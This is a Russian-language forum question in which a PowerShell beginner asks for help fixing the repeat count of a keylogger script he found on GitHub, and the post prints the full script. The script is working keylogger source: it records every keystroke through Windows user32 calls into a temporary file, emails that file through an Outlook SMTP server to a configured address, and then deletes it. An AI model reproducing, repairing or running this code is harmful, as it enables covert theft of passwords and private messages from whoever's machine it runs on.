Я новичок в Powershell и только что экспериментировал с ним, чтобы узнать, как он работает. Недавно я нашел классный скрипт кейлоггера на github, который решил проверить. Это все работает, кроме количества повторений ($TimesToRun
).
Я провел большую часть своего дня сегодня, пытаясь выяснить, в чем проблема, и исправить ее, но пока безуспешно.
Я также попытался переписать скрипт. Одна вещь, которую я попробовал, это зациклить скрипт разными способами: [for ($i=1; $i -le 5; $i++)
и т. Д.], Но он все равно не сработает. Он просто закрывается после первого периода времени или новый файл .txt не создается, поэтому я получаю сообщение об ошибке. Вот сценарий, возможно, кто-то может помочь мне найти проблему:
# Edit only this section!
$TimesToRun = 2
$RunTimeP = 1
$From = "USER1@mail.com"
$To = "USER2@mail.com"
$Subject = "Keylogger Results"
$body = "Keylogger Results"
$SMTPServer = "smtp.outlook.com"
$SMTPPort = "587"
$credentials = Get-Credential
############################
$TimeStart = Get-Date
$TimeEnd = $timeStart.addminutes($RunTimeP)
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# load signatures and make members available
$API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
# create output file
$null = New-Item -Path $Path -ItemType File -Force
try
{
# create endless loop. When user presses CTRL+C, finally-block
# executes and shows the collected key presses
$Runner = 0
while ($TimesToRun -ge $Runner) {
while ($TimeEnd -ge $TimeNow) {
Start-Sleep -Milliseconds 40
# scan all ASCII codes above 8
for ($ascii = 9; $ascii -le 254; $ascii++) {
# get current key state
$state = $API::GetAsyncKeyState($ascii)
# is key pressed?
if ($state -eq -32767) {
$null = [console]::CapsLock
# translate scan code to real code
$virtualKey = $API::MapVirtualKey($ascii, 3)
# get keyboard state for virtual keys
$kbstate = New-Object Byte[] 256
$checkkbstate = $API::GetKeyboardState($kbstate)
# prepare a StringBuilder to receive input key
$mychar = New-Object -TypeName System.Text.StringBuilder
# translate virtual key
$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
if ($success)
{
# add key to logger file
[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
}
}
}
$TimeNow = Get-Date
}
send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
Remove-Item -Path $Path -force
}
}
finally
{
# open logger file in Notepad
exit 1
}
}
# records all key presses until script is aborted by pressing CTRL+C
# will then open the file with collected key codes
Start-KeyLogger